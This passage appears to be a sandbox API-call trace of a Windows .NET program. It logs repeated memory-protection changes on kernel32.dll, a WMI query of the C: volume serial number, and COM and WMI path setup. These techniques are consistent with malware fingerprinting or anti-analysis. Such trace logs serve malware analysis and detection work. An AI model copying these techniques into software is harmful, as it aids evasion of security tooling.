NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.871] GetCurrentProcess () returned 0xffffffff [0092.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41300, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.871] GetCurrentProcess () returned 0xffffffff [0092.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41300, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.871] GetCurrentProcess () returned 0xffffffff [0092.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41308, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.871] GetCurrentProcess () returned 0xffffffff [0092.871] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41308, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.872] GetCurrentProcess () returned 0xffffffff [0092.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e4132c, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.872] GetCurrentProcess () returned 0xffffffff [0092.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e4132c, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.872] GetCurrentProcess () returned 0xffffffff [0092.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41390, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.872] GetCurrentProcess () returned 0xffffffff [0092.872] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41390, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.873] IWbemClassObject:Get (in: This=0x601efb0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ed510*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34e6670*=0, plFlavor=0x34e6674*=0 | out: pVal=0x6ed510*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34e6670*=8, plFlavor=0x34e6674*=0) returned 0x0 [0092.873] GetProcAddress (hModule=0x76e40000, lpProcName=0x95) returned 0x76e446a5 [0092.873] SysStringByteLen (bstr="9C354B42") returned 0x10 [0092.873] SysStringByteLen (bstr="9C354B42") returned 0x10 [0092.873] IWbemClassObject:Get (in: This=0x601efb0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ed518*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34e6670*=8, plFlavor=0x34e6674*=0 | out: pVal=0x6ed518*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34e6670*=8, plFlavor=0x34e6674*=0) returned 0x0 [0092.873] SysStringByteLen (bstr="9C354B42") returned 0x10 [0092.873] SysStringByteLen (bstr="9C354B42") returned 0x10 [0092.890] SysReAllocStringLen (in: pbstr=0x6eb470*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6eb470*="kernel32.dll") returned 1 [0092.890] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0092.890] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0092.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0092.899] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d8 [0092.900] GetLastError () returned 0x0 [0092.900] SysReAllocStringLen (in: pbstr=0x6eafd8*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x6eafd8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0092.900] GetThreadLocale () returned 0x409 [0092.900] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0092.900] GetThreadLocale () returned 0x409 [0092.900] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0092.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6ead5c, lpFilePart=0x6ead58 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", lpFilePart=0x6ead58*="System.Core.ni.dll.aux") returned 0x72 [0092.900] SysReAllocStringLen (in: pbstr=0x6eafd8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x6eafd8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0092.900] SysReAllocStringLen (in: pbstr=0x6eaf88*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", len=0x72 | out: pbstr=0x6eaf88*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux") returned 1 [0092.900] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", cchLength=0x72 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux") returned 0x72 [0092.900] SysReAllocStringLen (in: pbstr=0x6eafd8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux", len=0x72 | out: pbstr=0x6eafd8*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\386fde9190d499d6645df8b90eb76242\\system.core.ni.dll.aux") returned 1 [0092.900] SetLastError (dwErrCode=0x0) [0092.900] GetCurrentThreadId () returned 0xb0c [0092.900] GetCurrentThreadId () returned 0xb0c [0092.900] GetCurrentThreadId () returned 0xb0c [0092.900] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] SetEvent (hEvent=0xbc) returned 1 [0092.901] GetFileSize (in: hFile=0x2d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x384 [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] GetCurrentThreadId () returned 0xb0c [0092.901] SetEvent (hEvent=0xbc) returned 1 [0092.901] ReadFile (in: hFile=0x2d8, lpBuffer=0xb7bfe0, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x6eb08c, lpOverlapped=0x0 | out: lpBuffer=0xb7bfe0*, lpNumberOfBytesRead=0x6eb08c*=0x384, lpOverlapped=0x0) returned 1 [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] ResetEvent (hEvent=0xb8) returned 1 [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] ResetEvent (hEvent=0xb8) returned 1 [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] GetCurrentThreadId () returned 0xb0c [0092.903] SetEvent (hEvent=0xbc) returned 1 [0092.903] SetEvent (hEvent=0xb8) returned 1 [0092.903] CloseHandle (hObject=0x2d8) returned 1 [0092.922] SysReAllocStringLen (in: pbstr=0x6e9e88*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e9e88*="kernel32.dll") returned 1 [0092.922] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0092.922] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0092.925] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] ResetEvent (hEvent=0xb8) returned 1 [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] ResetEvent (hEvent=0xb8) returned 1 [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] GetCurrentThreadId () returned 0xb0c [0092.926] SetEvent (hEvent=0xbc) returned 1 [0092.926] SetEvent (hEvent=0xb8) returned 1 [0092.926] CloseHandle (hObject=0x2d8) returned 1 [0092.934] SysReAllocStringLen (in: pbstr=0x6e9e88*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6e9e88*="kernel32.dll") returned 1 [0092.934] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0092.934] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0092.936] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] ResetEvent (hEvent=0xb8) returned 1 [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] ResetEvent (hEvent=0xb8) returned 1 [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] GetCurrentThreadId () returned 0xb0c [0092.937] SetEvent (hEvent=0xbc) returned 1 [0092.937] SetEvent (hEvent=0xb8) returned 1 [0092.937] CloseHandle (hObject=0x2d8) returned 1 [0092.940] SysReAllocStringLen (in: pbstr=0x6ea590*=0x0, psz="System.Core.ni.dll", len=0x12 | out: pbstr=0x6ea590*="System.Core.ni.dll") returned 1 [0092.940] CharLowerBuffW (in: lpsz="System.Core.ni.dll", cchLength=0x12 | out: lpsz="system.core.ni.dll") returned 0x12 [0092.940] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\386fde9190d499d6645df8b90eb76242\\System.Core.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x71e90000 [0093.022] GetLastError () returned 0x0 [0093.078] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateGuid") returned 0x766615d5 [0093.078] CoCreateGuid (in: pguid=0x6ed614 | out: pguid=0x6ed614*(Data1=0x4cb40eb8, Data2=0x76cb, Data3=0x4cc4, Data4=([0]=0xa8, [1]=0xa0, [2]=0xe9, [3]=0x22, [4]=0x61, [5]=0xb7, [6]=0xa5, [7]=0xa4))) returned 0x0 [0093.099] CoTaskMemAlloc (cb=0x20c) returned 0xb7afd8 [0093.099] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb7afd8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0093.099] CoTaskMemFree (pv=0xb7afd8) [0093.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0093.099] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb28 | out: ppv=0x6eeb28*=0xb51e34) returned 0x0 [0093.099] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb20 | out: pAptType=0x6eeb20*=1) returned 0x0 [0093.099] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb24 | out: ppvObject=0x6eeb24*=0x0) returned 0x80004002 [0093.100] IUnknown:Release (This=0xb51e34) returned 0x1 [0093.100] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee490 | out: ppv=0x6ee490*=0x6010d70) returned 0x0 [0093.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010d70, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee6a8 | out: ppvObject=0x6ee6a8*=0x0) returned 0x80004002 [0093.100] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010d70, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6bc | out: ppvObject=0x6ee6bc*=0x601cc08) returned 0x0 [0093.100] WbemDefPath:IUnknown:Release (This=0x6010d70) returned 0x0 [0093.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2dc | out: ppvObject=0x6ee2dc*=0x601cc08) returned 0x0 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee298 | out: ppvObject=0x6ee298*=0x0) returned 0x80004002 [0093.101] WbemDefPath:IUnknown:AddRef (This=0x601cc08) returned 0x3 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbf4 | out: ppvObject=0x6edbf4*=0x0) returned 0x80004002 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edba4 | out: ppvObject=0x6edba4*=0x0) returned 0x80004002 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edbb0 | out: ppvObject=0x6edbb0*=0xb6f830) returned 0x0 [0093.101] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xb6f830, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edbb8 | out: pCid=0x6edbb8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0093.101] WbemDefPath:IUnknown:Release (This=0xb6f830) returned 0x3 [0093.101] CoGetContextToken (in: pToken=0x6edc10 | out: pToken=0x6edc10) returned 0x0 [0093.101] CoGetContextToken (in: pToken=0x6ee018 | out: pToken=0x6ee018) returned 0x0 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee0a8 | out: ppvObject=0x6ee0a8*=0x0) returned 0x80004002 [0093.101] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x2 [0093.101] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x1 [0093.101] CoGetContextToken (in: pToken=0x6ee9a0 | out: pToken=0x6ee9a0) returned 0x0 [0093.101] CoGetContextToken (in: pToken=0x6ee900 | out: pToken=0x6ee900) returned 0x0 [0093.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x6ee9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9cc | out: ppvObject=0x6ee9cc*=0x601cc08) returned 0x0 [0093.101] WbemDefPath:IUnknown:AddRef (This=0x601cc08) returned 0x3 [0093.101] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x2 [0093.101] WbemDefPath:IWbemPath:SetText (This=0x601cc08, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6eeb54 | out: puCount=0x6eeb54*=0x0) returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb50*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb50*=0x20, pszText=0x0) returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=2, puBuffLength=0x6eeb50*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eeb50*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetInfo (in: This=0x601cc08, uRequestedInfo=0x0, puResponse=0x6eeb5c | out: puResponse=0x6eeb5c*=0xc19) returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6eeb54 | out: puCount=0x6eeb54*=0x0) returned 0x0 [0093.101] WbemDefPath:IWbemPath:GetInfo (in: This=0x601cc08, uRequestedInfo=0x0, puResponse=0x6eeb5c | out: puResponse=0x6eeb5c*=0xc19) returned 0x0 [0093.102] WbemDefPath:IWbemPath:GetInfo (in: This=0x601cc08, uRequestedInfo=0x0, puResponse=0x6eeb5c | out: puResponse=0x6eeb5c*=0xc19) returned 0x0 [0093.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6eead4 | out: puCount=0x6eead4*=0x0) returned 0x0 [0093.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6eeac0 | out: puCount=0x6eeac0*=0x2) returned 0x0 [0093.102] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6eeabc*=0x0, pszText=0x0 | out: puBuffLength=0x6eeabc*=0xf, pszText=0x0) returned 0x0 [0093.102] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6eeabc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6eeabc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0093.102] CoGetObjectContext (in: riid=0x34e26c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eea70 | out: ppv=0x6eea70*=0xb51e34) returned 0x0 [0093.102] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eea68 | out: pAptType=0x6eea68*=1) returned 0x0 [0093.102] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34e26b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eea6c | out: ppvObject=0x6eea6c*=0x0) returned 0x80004002 [0093.102] IUnknown:Release (This=0xb51e34) returned 0x1 [0093.102] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee3d8 | out: ppv=0x6ee3d8*=0x601ccc0) returned 0x0 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ccc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee5f0 | out: ppvObject=0x6ee5f0*=0x0) returned 0x80004002 [0093.103] WbemDefPath:IClassFactory:CreateInstance (in: This=0x601ccc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee604 | out: ppvObject=0x6ee604*=0x601f198) returned 0x0 [0093.103] WbemDefPath:IUnknown:Release (This=0x601ccc0) returned 0x0 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee224 | out: ppvObject=0x6ee224*=0x601f198) returned 0x0 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee1e0 | out: ppvObject=0x6ee1e0*=0x0) returned 0x80004002 [0093.103] WbemDefPath:IUnknown:AddRef (This=0x601f198) returned 0x3 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edb3c | out: ppvObject=0x6edb3c*=0x0) returned 0x80004002 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edaec | out: ppvObject=0x6edaec*=0x0) returned 0x80004002 [0093.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edaf8 | out: ppvObject=0x6edaf8*=0xb6f6e0) returned 0x0 [0093.103] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xb6f6e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edb00 | out: pCid=0x6edb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0093.103] WbemDefPath:IUnknown:Release (This=0xb6f6e0) returned 0x3 [0093.103] CoGetContextToken (in: pToken=0x6edb58 | out: pToken=0x6edb58) returned 0x0 [0093.104] CoGetContextToken (in: pToken=0x6edf60 | out: pToken=0x6edf60) returned 0x0 [0093.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f198, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 